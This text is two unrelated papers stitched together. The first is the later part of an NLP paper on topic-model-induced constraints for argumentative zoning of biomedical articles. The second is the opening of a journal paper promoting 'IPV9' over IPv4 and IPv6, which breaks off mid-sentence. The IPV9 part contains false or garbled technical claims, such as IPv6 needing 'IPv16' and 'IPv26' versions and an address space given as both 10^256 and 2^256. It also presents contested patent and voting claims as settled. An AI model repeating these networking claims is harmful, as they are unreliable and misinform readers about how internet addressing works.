al., 2007)). Our key contribution is the automatic induction of declarative knowledge that can be easily integrated into unsupervised models in the form of constraints and bias functions. Our model requires minimal do- main and task knowledge. We do not specify lists of words or discourse markers (as in (Guo et al., 2013a)) but, instead, our model automatically asso- ciates latent variables both with linguistic features, taken from a very broad and general feature set (e.g. 136 BKG PROB METH RES CON CN DIFF FUT Article 16.9 2.8 34.8 17.9 22.3 4.3 0.8 0.2 (8171) Introduction 74.8 13.2 5.4 0.6 5.9 0.1 - - (1160) Methods 0.5 0.2 97.5 1.4 0.2 0.2 0.1 - (2557) Results 4.0 2.1 11.7 68.9 12.1 1.1 0.1 - (2054) Discussion 16.9 1.1 0.7 1.5 63.5 13.3 2.4 0.7 (2400) Table 3: Distribution of sentences (shown in percentages) in articles and individual sections in the AZ-annotated corpus. The total number of sentences in each section appears in parentheses below the section name. all the words that belong to a given set of POS tags), and with sentences in the input text. In the next sec- tion we present our experiments which demonstrate the usefulness of this declarative knowledge. 4 Experiments Data and Models We used the full paper cor- pus earlier employed in (Guo et al., 2013a) which includes 8171 annotated sentences (with reported inter-annotator agreement: κ = .83) from 50 biomedical journal articles from the cancer risk as- sessment domain. One third of this corpus was saved for a development set on which our model was de- signed and its hyperparameters were tuned (see be- low). The corpus is annotated according to the Argu- mentative Zoning (AZ) scheme (Teufel and Moens, 2002; Mizuta et al., 2006) described in Table 1. Ta- ble 3 shows the distribution of AZ categories and the total number of sentences in each individual section. Since section names vary across articles, we grouped similar sections before calculating the statistics (e.g. Materials and Methods sections were grouped under Method). The table demonstrates that although there is a dominant category in each section (e.g. BKG in Introduction), up to 36.5% of the sentences in each section fall into other categories. Feature Extraction We used the C&C POS tag- ger and parser trained on biomedical literature (Cur- ran et al., 2007; Rimell and Clark, 2009) in the fea- ture extraction process. Lemmatization was done with Morpha (Minnen et al., 2001). Baselines We compared our models (TopicGC and TopicGE) against the following baselines: (a) an unconstrained unsupervised model – the unbiased version of the graph clustering we use for TopicGC (i.e. where g(·) is omitted, GC); (b) the unsuper- vised constrained GE method of (Guo et al., 2013a) where the constraints were created by experts (Ex- pertGE); (c) supervised unconstrained Maximum Entropy models, each trained to predict categories in a particular section using 150 sentences from that section, as in the lightly supervised case in (Guo et al., 2013a) (MaxEnt); and (d) a baseline that assigns all the sentences in a given section to the most fre- quent gold-standard category of that section (Table 3). This baseline emulates the use of section names for information structure classification. Our constraints, which we use in the TopicGE and TopicGC models, are based on topics that are learned on the test corpus. While having access to the raw test text at training time is a standard as- sumption in many unsupervised NLP works (e.g. (Klein and Manning, 2004; Goldwater and Grif- fiths, 2007; Lang and Lapata, 2014)), it is impor- tant to quantify the extent to which our method de- pends on its access to the test set. We therefore con- structed the TopicGE* model which is identical to TopicGE except that the topics are learned from an- other collection of 47 biomedical articles contain- ing 9352 sentences. Like our test set, these articles are from the cancer risk assessment domain - all of them were published in the Toxicol. Sci. journal in the years 2009-2012 and were retrieved using the PubMed search engine with the key words “cancer risk assessment”. There is no overlap between this new dataset and our test set (Guo et al., 2013a). Models and Parameters For graph clustering, we used the Graclus software (Dhillon et al., 2007). For GE and MaxEnt, we used the Mallet software (McCallum, 2002). The γ parameter in the graph clustering was set to 10 using the development data. Several values of this parameter in the range of [10,1000] yielded very similar performance. The number of key features considered for each topic, N, was set to 40, 20 and 15 for the article, Introduc- tion section, and Discussion section topic models, respectively. This difference reflects the number of feature types (Table 2) and the text volume (Table 3) of the respective models. Evaluation We evaluated the overall accuracy as well as the category-level precision, recall and F- score for each section. TopicGC, TopicGE, Top- icGE* and the baseline GC methods are unsuper- 137 Introduction Method Result Discussion GC TGC TGE TGE* EGE MFC GC TGC TGE TGE* EGE MFC GC TGC TGE TGE* EGE MFC GC TGC TGE TGE* EGE MFC F1 BKG .78 .83 .89 .86 .87 .86 - - - - .07 - - - - - .46 - .47 .47 .45 .49 .46 - PROB .34 .16 .31 .19 .24 - - - - - .33 - - - - - .04 - - - - - .32 - METH - .16 .12 .16 .35 - .98 .98 .98 .98 .93 .99 .29 - .25 .32 .29 - - - - - .14 - RES - - - - .07 - - - - - .27 - .67 .82 .81 .77 .80 .82 - - - - .14 - CON - .10 .26 .03 .28 - - - - - - - .39 .28 .27 .29 .42 - .82 .83 .82 .82 .71 .78 CN - - - - - - - - - - - - - - - - .25 - - .21 .23 .11 .20 - DIFF - - - - - - - - - - - - - - - - - - - - - - .12 - FUT - - - - - - - - - - - - - - - - - - - - - - .36 - Acc. .61 .68 .77 .74 .72 .75 .97 .97 .97 .97 .87 .97 .51 .68 .67 .62 .64 .69 .66 .67 .67 .67 .56 .63 Table 4: Performance (class based F1-score and overall accuracy (Acc.)) of unbiased Graph Clustering (GC), Graph Clustering with declarative knowledge learned from topic modeling (TopicGC model, TGC column), Generalized Expectation using constraints learned from topic modeling (TopicGE, TGE) and the same model where constraints are learned using an external set of articles (TopicGE*, TGE*), GE with constraints created by experts (ExpertGE, EGE - a replication of (Guo et al., 2013a)) and the most frequent gold standard category of the section (MFC) vised and therefore induce unlabeled categories. To evaluate their output against the gold standard AZ annotation we first apply a standard greedy many- to-one mapping (naming) scheme in which each in- duced category is mapped to the gold category that shares the highest number of elements (sentence) with it (Reichart and Rappoport, 2009). The to- tal number of induced topics was 9 with each topic model inducing three topics.4 For light supervision, a ten-fold cross-validation scheme was applied. In addition, we compare the quality of the auto- matically induced and manually constructed declar- ative knowledge in the context of customized sum- marization (Contractor et al., 2012) where sum- maries of specific types of information in an article are to be generated (we focused on the article’s con- clusions). While an intuitive solution would be to summarize the Discussion section of a paper, only 63.5% of its sentences belong to the gold standard Conclusion category (Table 3). For our experiment, we first generated five sets of sentences. The first four sets consist of the ar- ticle sentences annotated with the CON category ac- cording to: TopicGE or TopicGC or ExpertGE or the gold standard annotation. The fifth set is the Discus- sion section. We then used Microsoft AutoSumma- rize (Microsoft, 2007) to select sentences from each of the five sets such that the number of words in each summary amounts for 10% of the words in the input. 4The number of gold standard AZ categories is 8. However, we wanted each of our topic models to induce the same number of topics in order to reduce the number of parameters to the required minimum. For evaluation, we asked an expert to summarize the conclusions of each article in the corpus. We then evaluated the five summaries against the gold- standard summaries written by the expert in terms of various ROUGE scores (Lin, 2004). 5 Results We report here the results for our constrained unsu- pervised models compared to the baselines. We start with quantitative evaluation and continue with qual- itative demonstration of the topics learned by the topic models and their key features which provide the substance for the constraints and bias functions used in our information structure models. Unsupervised Learning Results Table 4 presents the performance of the four main unsupervised learning models discussed in this paper: GC, Top- icGC, TopicGE, and ExpertGE of (Guo et al., 2013a). Our models (TopicGC and TopicGE) out- perform the ExpertGE when considering category based F-score for the dominant categories of each section. ExpertGE is most useful in identifying the less frequent categories of each section (Table 3), which is in line with (Guo et al., 2013a). The overall sentence-based accuracy of TopicGE is significantly higher than that of ExpertGE for all four sections (bottom line of the table). Furthermore, for all four sections it is one of our models (TopicGC or Top- icGE) that provides the best result under this mea- sure, among the unsupervised models. The table further provides a comparison of the un- supervised models to the MFC baseline which as- signs all the sentences of a section to its most fre- 138 Introduction Method Result Discussion TopicGE Light TopicGE Light TopicGE Light TopicGE Light P R F P R F P R F P R F P R F P R F P R F P R F BKG .84 .95 .89 .78 .99 .87 - - - - - - - - - - - - .41 .51 .45 .38 .19 .25 PROB .33 .30 .31 .57 .11 .18 - - - - - - - - - .25 .02 .04 - - - - - - METH .40 .07 .12 .50 .21 .30 .97 1 .98 .97 1 .98 .34 .20 .25 .62 .14 .23 - - - - - - RES - - - - - - - - - - - - .74 .90 .81 .71 .98 .82 - - - - - - CON .44 .18 .26 .80 .06 .11 - - - - - - .30 .25 .27 .57 .16 .25 .78 .87 .82 .69 .96 .80 CN - - - - - - - - - - - - - - - - - - .32 .18 .23 .35 .06 .10 DIFF - - - - - - - - - - - - - - - - - - - - - - - - FUT - - - - - - - - - - - - - - - - - - - - - - - - Acc. 0.77 0.77 0.97 0.97 0.67 0.70 0.67 0.66 Table 5: Performance (class based Precision, Recall and F-score as well as overall accuracy (Acc.)) of the TopicGE model and of an unconstrained MaxEnt model trained with Light supervision (total of 600 sentences - 150 training sentences for each section-level model). The same pattern of results holds when the MaxEnt is trained with up to 2000 sentences (500 sentences for each section-level model). TopicGE TopicGC ExpertGE Section Gold R P F R P F R P F R P F R P F ROUGE-1 45.2 54.0 46.8 43.5 55.1 46.1 43.7 49.1 43.8 46.7 43.8 42.6 43.3 55.4 46.2 ROUGE-2 30.0 35.8 30.8 28.4 35.7 29.8 25.5 28.2 25.2 28.6 26.3 25.8 27.8 35.1 29.3 ROUGE-L 43.3 51.6 44.8 41.6 52.6 44.1 41.3 46.2 41.3 44.2 41.3 40.3 41,1 52.3 43.7 Table 6: ROUGE scores of zone (TopicGE, TopicGC, ExpertGE or gold standard) and Discussion section based sum- maries. TopicGE provides the best summaries. TopicGC outperforms ExpertGE and the Discussion section systems and in two measures the gold categorization based system as well. Result patterns with ROUGE(3,4,W-1.2, S* and SU*) are very similar to those of the table. The differences between TopicGE and ExpertGE are statistically significant using t-test with p < 0.05. The differences between TopicGE and gold, as well as between ExpertGE and gold are not statistically significant. quent category according to the gold standard. This baseline sheds light on the usefulness of section names for our task. As is evident from the table, while this baseline is competitive with the unsuper- vised models in terms of accuracy, its class-based F-score performance is quite poor. Not only does it lag behind the unsupervised models in terms of the F-score of the most frequent classes of the Introduc- tion and Discussion sections, but it does not iden- tify any of the classes except from the most frequent ones in any of the sections - a task the unsupervised models often perform with reasonable quality. Finally, the table also presents the performance of the TopicGE* model for which constraints are leaned from an external data set - different from the test set. The results show that there is no substantial difference between the performance of the TopicGE and TopicGE* models. While TopicGE achieves better F-scores in five of the cases in the table, Top- icGE* is better in four cases and the performance is identical in two cases. Section level accuracies are better for TopicGE in two of the four sections, but the difference is only 3-5%. Comparison with Supervised Learning Table 5 compares the quality of unsupervised constrained- based learning with that of lightly supervised feature-based learning. Since our models, TopicGC and TopicGE, perform quite similarly, we included only TopicGE in this evaluation. The lightly su- pervised models (MaxEnt classifiers) were trained with a total of 600 sentences - 150 for each section- specific classifier. The table demonstrates that Top- icGE outperforms MaxEnt with light supervision in terms of class based F-scores in the Introduction and Discussion sections. In the Methods section, where 97.5% of the sentences belong to the most frequent category, and in the Results section, the models per- form quite similarly. Overall accuracy numbers are quite similar for both models with MaxEnt doing better for the Results section and TopicGE for the Discussion section. These results further demon- strate that unsupervised constrained learning pro- vides a practical solution to information structure analysis of scientific articles. Extractive Summarization Evaluation Table 6 presents the average ROUGE scores for zone- based (TopicGE, TopicGC, ExpertGE and gold) and section-based summaries across our test set articles. 139 Topic Features 1 {do} be {done}{doing}{be done}{have been done} induce {may do}{to do} show have {have done} increase {did} suggest indicate report cause include inhibit find observe involve associate activate demonstrate result use lead play {could do} know {do do} form contribute {can do}{would do} promote reduce 2 {were done} {done} {doing} {did} use be describe contain perform incubate {do} determine analyze follow add isolate purchase wash accord {to do} treat collect remove prepare obtain measure store stain centrifuge transfer detect purify assess supplement carry dissolve plate receive kill 3 {did}{done} be {doing}{were done} [tab fig] {do} show increase observe compare {to do} expose use have find {did do} treat {be done} report follow drink reduce result administer decrease determine measure include evaluate affect detect induce indicate associate provide reveal suggest occur Table 7: Topics and key features extracted by the article-level model (including modal, tense and voice marked in curly brackets, reference to tables or figures marked in square brackets, and verbs in the base form) Topic Features 1 [no cite] {did} (we) {done}{do}{doing} use {were done} (present) {to do} investigate be (mammary) determine provide (our) treat compare examine 2 {did}{done} [cite] {doing}{were done} be expose find [no cite] drink increase report (recent) (previous) admin- ister {do} contain evaluate (early) 3 {do} [cite] be {done} [no cite] {doing} {be done} {have been done} induce {have done} (it) show {may do} have {to do} include increase (their) associate Table 8: Topics and key features extracted by the section-specific topic model of the Introduction section (including citations marked in square brackets, pronouns and the follow-up adjective modifiers marked in parentheses, modal, tense and voice marked in curly brackets, and verbs in their base form) Topic Features 1 (we) [no cite] (our) higher (mammary) as because (first) significant possible high (early) (positive) most 2 [cite] present (present) (previous) similar different (its) although consistent furthermore greater due most whereas 3 [no cite] not also (it) but however more (their) both therefore only thus significant lower Table 9: Topics and key features extracted by the section-specific topic model of the Discussion section (including citations marked in square brackets, pronouns and the follow-up adjective modifiers marked in parentheses, and con- junctions, adjectives and adverbs) TopicGE and TopicGC based summaries outperform the other systems, even the one that uses gold stan- dard information structure categorization. A poten- tial explanation for the better performance of our models compared to ExpertGE is that the relative strength of our models is in identifying the major category of each section while ExpertGE is better at identifying low or medium frequency categories. Qualitative Analysis We next provide a qualita- tive analysis of the topics induced by our topic mod- els — the article-level model as well as the section- level models — and their key features. Note that both our models, TopicGE and TopicGC, assume that the induced topics provide a good approxima- tion of the information structure categories and build their constraints (expert knowledge) from these top- ics accordingly. Below we examine this assumption. Table 7 presents the topics and key features ob- tained from global topic modeling applied to full ar- ticles. The table reveals a strong correlation between present/future tense and topic 1, and between past tense and topics 2 and 3 (Modal, Tense and Voice features). The table further demonstrates that top- ics 1 and 3 are linked to verbs that describe research findings, such as “show” and “demonstrate” in topic 1, and “report” and “indicate” in topic 3, whereas topic 2 seems related to verbs that describe methods and experiments such as “use” and “prepare“. The feature corresponding to tables and figures [tab fig] is only seen in topic 3. Based on these observations, topics 1, 2 and 3 seem to be related to AZ categories CON, METH and RES respectively. Tables 8 and 9 present the topics and the key fea- tures obtained from the section-specific topic mod- 140 eling for the Introduction and Discussion sections. Due to space limitations we cannot provide a de- tailed analysis of the information included in these tables, but it is easy to see that they provide evi- dence for the correlation between topics in the sec- tion specific models and AZ categories. Table 8 demonstrates that for the Introduction section topic 1 correlates with the author’s work and topics 2 and 3 with previous work. Table 9 shows that for the Discussion section topics 1 and 3 well correlate with the AZ CON category and topic 2 with the BKG, CN and DIFF categories. Our analysis therefore demon- strates that the induced topics are well aligned with the actual categories of the AZ classification scheme or with distinctions (e.g. the author’s own work vs. works of others) that are very relevant for this scheme. Note that we have not seeded our models with word-lists and the induced topics are therefore purely data-driven. 6 Discussion We presented a new framework for automatic in- duction of declarative knowledge and applied it to constraint-based modeling of the information struc- ture analysis of scientific documents. Our main con- tribution is a topic-model based method for unsuper- vised acquisition of lexical, syntactic and discourse knowledge guided by the notion of topics and their key features. We demonstrated that the induced top- ics and key features can be used with two differ- ent unsupervised learning methods – a constrained unsupervised generalized expectation model and a graph clustering formulation. Our results show that this novel framework rivals more supervised alterna- tives. Our work therefore contributes to the impor- tant challenge of automatically inducing declarative knowledge that can reduce the dependence of ML algorithms on manually annotated data. The next natural step in this research is generaliz- ing our framework and make it applicable to more applications, domains and machine learning mod- els. We are currently investigating a number of ideas which will hopefully lead to better natural language learning with reduced human supervision. References Sam Anzaroot, Alexandre Passos, David Belanger, and Andrew McCallum. 2014. Learning soft linear con- straints with application to citation field extraction. In ACL, pages 593–602. Kedar Bellare, Gregory Druck, and Andrew McCallum. 2009. Alternating projections for learning with expec- tation constraints. In Proceedings of the 25th Con- ference on Uncertainty in Artificial Intelligence, pages 43–50. Catherine Blake. 2009. Beyond genes, proteins, and abstracts: Identifying scientific claims from full-text biomedical articles. Journal of Biomedical Informat- ics, 43(2):173–189. David M. Blei, Andrew Y. Ng, and Michael I. Jordan. 2003. Latent dirichlet allocation. Journal of Machine Learning Research, 3:993–1022. Jill Burstein, Daniel Marcu, and Kevin Knight. 2003. Finding the write stuff: Automatic identification of discourse structure in student essays. IEEE Intelligent Systems, 18(1):32–39. Ming-Wei Chang, Lev Ratinov, and Dan Roth. 2007. Guiding semi-supervision with constraint- driven learning. In ACL, pages 280–287. Danish Contractor, Yufan Guo, and Anna Korhonen. 2012. Using argumentative zones for extractive sum- marization of scientific articles. In COLING, pages 663–678. James Curran, Stephen Clark, and Johan Bos. 2007. Linguistically motivated large-scale nlp with c&c and boxer. In Proceedings of the ACL 2007 Demo and Poster Sessions, pages 33–36. Inderjit S. Dhillon, Yuqiang Guan, and Brian Kulis. 2007. Weighted graph cuts without eigenvectors: A multilevel approach. IEEE Transactions on Pat- tern Analysis and Machine Intelligence, 29(11):1944– 1957. Gregory Druck, Gideon Mann, and Andrew McCallum. 2008. Learning from labeled features using gener- alized expectation criteria. In Proceedings of the 31st annual international ACM SIGIR conference on Research and development in information retrieval, pages 595–602. Kuzman Ganchev, João Graça, Jennifer Gillenwater, and Ben Taskar. 2010. Posterior regularization for struc- tured latent variable models. Journal of Machine Learning Research, 11:2001–2049. Sharon Goldwater and Tom Griffiths. 2007. A fully bayesian approach to unsupervised part-of-speech tag- ging. In ACL, pages 744–751. Thomas L Griffiths and Mark Steyvers. 2004. Find- ing scientific topics. Proceedings of the National Academy of Sciences, 101(suppl 1):5228–5235. 141 Yufan Guo, Anna Korhonen, Maria Liakata, Ilona Silins Karolinska, Lin Sun, and Ulla Stenius. 2010. Identify- ing the information structure of scientific abstracts: an investigation of three different schemes. In BioNLP, pages 99–107. Yufan Guo, Anna Korhonen, and Thierry Poibeau. 2011a. A weakly-supervised approach to argumenta- tive zoning of scientific documents. In EMNLP, pages 273–283. Yufan Guo, Anna Korhonen, Ilona Silins, and Ulla Ste- nius. 2011b. Weakly-supervised learning of infor- mation structure of scientific abstracts–is it accurate enough to benefit real-world tasks in biomedicine? Bioinformatics, 27(22):3179–3185. Yufan Guo, Roi Reichart, and Anna Korhonen. 2013a. Improved information structure analysis of scientific documents through discourse and lexical constraints. In NAACL HLT, pages 928–937. Yufan Guo, Ilona Silins, Ulla Stenius, and Anna Korho- nen. 2013b. Active learning-based information struc- ture analysis of full scientific articles and two applica- tions for biomedical literature review. Bioinformatics, 29(11):1440–1447. Kenji Hirohata, Naoaki Okazaki, Sophia Ananiadou, and Mitsuru Ishizuka. 2008. Identifying sections in sci- entific abstracts using conditional random fields. In IJCNLP, pages 381–388. Douwe Kiela, Yufan Guo, Ulla Stenius, and Anna Ko- rhonen. 2014. Unsupervised discovery of informa- tion structure in biomedical documents. Bioinformat- ics, page btu758. Dan Klein and Christopher Manning. 2004. Corpus- based induction of syntactic structure: Models of de- pendency and constituency. In ACL, pages 478–485. Joel Lang and Mirella Lapata. 2014. Similarity-driven semantic role induction via graph partitioning. Com- putational Linguistics, 40(3):633–669. Maria Liakata, Simone Teufel, Advaith Siddharthan, and Colin Batchelor. 2010. Corpora for conceptualization and zoning of scientific papers. In LREC, pages 2054– 2061. Maria Liakata, Shyamasree Saha, Simon Dobnik, Colin Batchelor, and Dietrich Rebholz-Schuhmann. 2012. Automatic recognition of conceptualization zones in scientific articles and two life science applications. Bioinformatics, 28(7):991–1000. Jimmy Lin, Damianos Karakos, Dina Demner-Fushman, and Sanjeev Khudanpur. 2006. Generative content models for structural analysis of medical abstracts. In BioNLP, pages 65–72. Chin-Yew Lin. 2004. ROUGE: A package for auto- matic evaluation of summaries. In Text Summarization Branches Out: Proceedings of the ACL-04 Workshop, pages 74–81. Gideon S Mann and Andrew McCallum. 2007. Simple, robust, scalable semi-supervised learning via expecta- tion regularization. In ICML, pages 593–600. Gideon S. Mann and Andrew McCallum. 2008. General- ized expectation criteria for semi-supervised learning of conditional random fields. In ACL, pages 870–878. Katja Markert, Yufang Hou, and Michael Strube. 2012. Collective classification for fine-grained information status. In ACL, pages 795–804. Andrew Kachites McCallum. 2002. MAL- LET: A machine learning for language toolkit. http://mallet.cs.umass.edu. David McClosky and Christopher D. Manning. 2012. Learning constraints for consistent timeline extraction. In EMNLP-CoNLL, pages 873–882. Microsoft. 2007. AutoSummarize: Automatically summarize a document. https://support.office.com/en- us/article/Automatically-summarize-a-document- b43f20ae-ec4b-41cc-b40a-753eed6d7424. Guido Minnen, John Carroll, and Darren Pearce. 2001. Applied morphological processing of english. Natural Language Engineering, 7(3):207–223. Yoko Mizuta, Anna Korhonen, Tony Mullen, and Nigel Collier. 2006. Zone analysis in biology articles as a basis for information extraction. International Journal of Medical Informatics on Natural Language Process- ing in Biomedicine and Its Applications, 75(6):468– 487. Diarmuid Ó Séaghdha and Simone Teufel. 2014. Unsu- pervised learning of rhetorical structure with un-topic models. In Proceedings of COLING 2014: Technical Papers, pages 2–13. Roi Reichart and Regina Barzilay. 2012. Multi-event ex- traction guided by global constraints. In NAACL HLT, pages 70–79. Roi Reichart and Anna Korhonen. 2012. Document and corpus level inference for unsupervised and transduc- tive learning of information structure of scientific doc- uments. In COLING, pages 995–1006. Roi Reichart and Ari Rappoport. 2009. The nvi cluster- ing evaluation measure. In CoNLL, pages 165–173. Laura Rimell and Stephen Clark. 2009. Porting a lexicalized-grammar parser to the biomedical domain. Journal of Biomedical Informatics, 42(5):852–865. Patrick Ruch, Clia Boyer, Christine Chichester, Imad Tbahriti, Antoine Geissbhler, Paul Fabry, Julien Gob- eill, Violaine Pillet, Dietrich Rebholz-Schuhmann, Christian Lovis, and Anne-Lise Veuthey. 2007. Using argumentation to extract key sentences from biomedi- cal abstracts. International Journal of Medical Infor- matics, 76(2-3):195–200. 142 Alexander Rush, Roi Reichart, Michael Collins, and Amir Globerson. 2012. Improved parsing and pos tag- ging using inter-sentence consistency constraints. In EMNLP-CoNLL, pages 1434–1444. Hagit Shatkay, Fengxia Pan, Andrey Rzhetsky, and W John Wilbur. 2008. Multi-dimensional classifica- tion of biomedical text: Toward automated, practical provision of high-utility text to diverse users. Bioin- formatics, 24(18):2086–2093. Imad Tbahriti, Christine Chichester, Frédérique Lisacek, and Patrick Ruch. 2006. Using argumentation to retrieve articles with similar citations. International Journal of Medical Informatics, 75(6):488–495. Simone Teufel and Marc Moens. 2002. Summariz- ing scientific articles: Experiments with relevance and rhetorical status. Computational Linguistics, 28(4):409–445. Simone Teufel, Advaith Siddharthan, and Colin Batche- lor. 2009. Towards domain-independent argumenta- tive zoning: Evidence from chemistry and computa- tional linguistics. In EMNLP, pages 1493–1502. Andrea Varga, Daniel Preotiuc-Pietro, and Fabio Ciravegna. 2012. Unsupervised document zone iden- tification using probabilistic graphical models. In LREC, pages 1610–1617. Bonnie Webber, Markus Egg, and Valia Kordoni. 2011. Discourse structure and language technology. Natural Language Engineering, 18(4):437–490. 143 144 work_v2ygecligzgubiokwwovbnqnqu ---- International Journal of Advanced Network, Monitoring and Controls Volume 05, No.01, 2020 DOI: 10.21307/ijanmc-2020-005 28 Comparison Research on Future Network Between IPv4, IPv6 and IPV9 YURY Halavachou Department of the International Relations Belarusian State University of Transport Republic of Belarus 34, Kirova street, Gomel, 246653 Republic of Belarus E-mail: oms@bsut.by Xu Fei School of Computer Science and Engineering Xi’an Technological University Xi’an, China E-mail: xinfei2000@qq.com Abstract—IPv4 is the most widely used protocol on the Internet, and its address space is 232. In the early stage of the Internet, due to the underestimation of the development of Internet, IP resources were very limited. By 2010, there was no address that could be allocated. In order to solve the problem of insufficient addresses, the IETF designed the next generation IPv6 protocol to replace IPv4, IPv6 has 2128 addresses in theory, and however, only one-eighth of the addresses can actually be allocated to end users. At present, 128 barcodes are already having 128 bits, and it cannot be covered, so IPv6 have some considerable limitations. In 1998, Chinese researcher proposed IPV9. In order to distinguish from IPv4 and IPv6, the V in IPV9 is uppercase, not lowercase. The IPV9 includes three technologies: a new address coding design, a new addressing mechanism and a new address architecture design. These technologies constitute the core technology system at the bottom of the new generation IP network. The new network framework designed on this basis can form a network system that is connected and compatible with existing networks. IPV9 is not a simple upgrade of IPv4 or IPv6 and its address space is 10256 by default. The massive address can meet the needs of human activities about 750 years, this paper will introduce the characteristics of the future network, and comparison the system between the IPv4, IPv6 and IPV9, and lay a solid foundation for the subsequent development. Keywords-IPv4; IPv6; IPV9; Future Network With the rapid development of science and technology, the world has entered an information age of data communication. The most famous of the data networks is Internet, a packet-switched network developed by the U.S. department of defense called the ARPANET, which is considered the precursor to the information superhighway. Now almost all countries and regions have joined the Internet. In order for information to be transmitted correctly over the Internet to its destination, each computer connected to the Internet must have a unique address. At present, there are three kinds of address compilation methods: one is "IP address", which consists of four digits divided by the dot; the other is "domain name", a series of strings split by dots, and the third is "Chinese domain name system", which consists of a three-level domain name split by a decimal and an oblique line. These three address structures have become the current network system; bringing great convenience to people's International Journal of Advanced Network, Monitoring and Controls Volume 05, No.01, 2020 29 access to the Internet, the network has completely changed people's lives. I. PROBLEMS WITH IPV4 AND IPV6 A. Problems with IPv4 1) Insufficient address Internet uses IPv4 protocol address scheme, the address number up to 232, due to the early development of the Internet to estimate the development trend of Internet, the IP allocation is not reasonable, address resources are exhausted, although no classification of addressing CIDR technology, network address translation NAT technology to alleviate the crisis, but still can't solve the problem. And address will be more and more widely used in e-commerce logistics code, space code, identity code, digital currency, three-dimensional geographical code and other intelligent terminals, the original address allocation technology cannot meet the needs of social development. 2) Route table expansion The topology of address space directly results in the form of address allocation independent of the network topology. With the increase of the number of networks and routers, the excessively expanded routing table increases the search and storage overhead and becomes the bottleneck of the Internet. At the same time, the length of packet head is not fixed, and it is very inconvenient to extract, analyze and select routes by hardware, so it is difficult to improve the throughput of routing data. Then there is the uneven distribution of IP addresses. Due to its origin in the United States, more than half of all addresses are owned by the United States, resulting in a serious imbalance in the distribution of IP addresses. 3) Lack of quality of service (QoS) IPv4 was originally designed for military use, and was not intended to be open to the outside world. As a result, QoS of quality of service and security were very poor, and it was difficult to provide rich QoS functions for real-time multimedia, mobile IP and other commercial services. Although the later developed protocols such as RSVP provided QoS support, the cost of planning and constructing IP network was relatively high. Despite of its shortcomings, IPv4 was the first network all over the world, and people had got to used it, so it will going forever. B. Problems with IPv6 The length of IPv6 is 128 bits, or 2128 addresses. The address space is much larger than the 32-bit address space. Moreover, the principle of Aggregation is adopted, which enables the router to represent a subnet with an Entry in the routing table, it greatly reducing the length of routing table in the router and improving the speed of forwarding packets. The addition of Multicast support and Flow Control over IPv6 has led to significant advances in multimedia applications, providing a good network platform for, Quality of Service Control (QoS). Despite its obvious advantages, IPv6 has a big flaw in the design of its address structure. The shortcomings are as follows. 1) Structural hierarchy disorder IPv6 confuses the network hierarchy in the design, and the interface ID inserts the physical address into the logical address layer, which on the one hand results in the physical address space forming a limitation on the empty IP address, the security does not belong to the content of the IP layer, it is not necessary to design security technology in the IP layer. Because with the development of security technology, security methods and key length will change constantly, so the development of security technology will eventually lead to the need for IP address redesign. 2) Ambiguous address space In the unicast address with more IPv6 applications, the structure of "network ID+ host ID" similar to IPv4 is adopted from a large point of view, and the network International Journal of Advanced Network, Monitoring and Controls Volume 05, No.01, 2020 30 ID of IPv6 is changed into a three-layer more structure with a fixed length of subnet prefix: "top-level aggregation ID+ secondary aggregation ID+ site-level aggregation ID". IPv6 is a kind of patchwork addressing. So its address space is not pure 128 bits. IPv6 address space is not the 128-bit address space that people think of. Due to the special address structure design, IPv6 itself has to go through three significantly different version transitions if it wants to truly implement the 128-bit address space, the IPv16 for 64-bit effective address space; IPv26 for 128-bit valid address space. The transition between the three versions is like to upgrade the three different protocols. 3) Incompatible with IPv4 IP address is the basic protocol of the Internet, and it is very difficult to solve it through complete replacement. Initially, without further study, the designers of IPv6 decided that the 32-address space problem of IPv4 could not be solved by a smooth upgrade, so they simply redesigned it entirely from scratch. IPv6 requires all nodes of the entire network to support the new IP protocol, and all terminal operating systems and applications to support upgrades, making the problem extremely difficult. These shortcomings are also the main reason why IPv6 has not been widely used since its emergence. II. FUTURE NETWORK IPV9 A. Process of IPV9 In December 1998, Xie Jianping, a scholar from Shanghai, China and the inventor of the Future Network, applied to the National Intellectual Property Administration (NIPA), PRC (formerly the Patent Office of China) for the invention patent of "the method of assigning addresses to computers connected to the network with full digital codes", which was officially authorized by the NIPA on November 7, 2001. In December 1998, Mr. Xie jianping registered the copyright in the national copyright administration of China in “the method of unified compilation and distribution of addresses of networked computers and intelligent terminals”, “the overall distribution method of computer addresses allocated by full decimal algorithm for networked computers”, and “the gateway of decimal number”. In October 2001, the “copyright of IPV9 protocol and application” was registered. In 2001, the former Science and Technology Department of the Ministry of Industry and Information Technology of China established the China Decimal Network Standards Working Group (IPV9 Working Group) with enterprises as the main body and industry, university and research institute as a combination. In 2002, the “code for digital domain names” was published, defining the "decimal network, IPV9 resource record and management organization". In 2007, the former Ministry of Industry and Information Technology of China formally defined IPV9 as the "future network" to distinguish the next generation of the Internet for IPv6. In 2011, the authoritative professional institutions of the US government have confirmed legally and technically that China has the core technology of sovereign network with independent intellectual property rights under the IP framework. This is the patented technology of IPV9 which is different from the existing technology of the US Internet. The official patent name is "Method of using whole digital code to assign address for computer". In December 2011, the U.S. federal patent and trademark office issued a patent certificate numbered US 8,082,365, stating in its notice of approval that the applicant's identification report was "very convincing". International Journal of Advanced Network, Monitoring and Controls Volume 05, No.01, 2020 31 On May 21, 2013 and March 11, 2014, the United States twice voted in favor of the China-led "naming and addressing" and "security" of the future network. On February 23, 2013, the State Council issued the national science and technology infrastructure construction medium and long term plan (2012-2030), in order to break through the future network basic theory and support the new generation of Internet experiments, the construction of future network test facilities. On June 1, 2016, the Ministry of Industry and Information Technology of China released relevant industry standards for IPV9 implemented nationwide: Including SJ/T11605 "for products and services based on the technology of radio frequency domain rules", "SJ/T11604 decimal network based RFID tag information orientation, query and service discovery technology standard", SJ/T11603 "used Digital ID format in information processing products and services", SJ/T11606 "the network architecture of RFID tags information query service specification", SJ/T11682 "based on the electronic tag information of decimal network location, query and service discovery and application". B. About IPV9 IPV9 is completely independent intellectual property rights on the basis of full decimal digit code, it has 2 256 of cyberspace sovereignty, including from mother root, master root, 13 root name servers, using zero trust security communication mechanism after verification first, compatible with the current Internet system, with overlapping geographical position and the IP address space for the future network architecture. On the basis of compatibility with all the functions of the Internet at present, IPV9 adopts the TCP/IP/M three-layer and four-layer hybrid architecture, with mixed virtual and real circuits, to complete the video data transmission of large code stream. IPV9 obtained Chinese patent in 2001 (CN98 1 22785), and has obtained authorized patents successively in more than ten countries and regions, including South Africa, Turkey, Kazakhstan, Russia, South Korea, North Korea, Hong Kong, Canada, Singapore, Australia, Mexico and Norway. IPV9 applied for US patent in 2004. It was issued 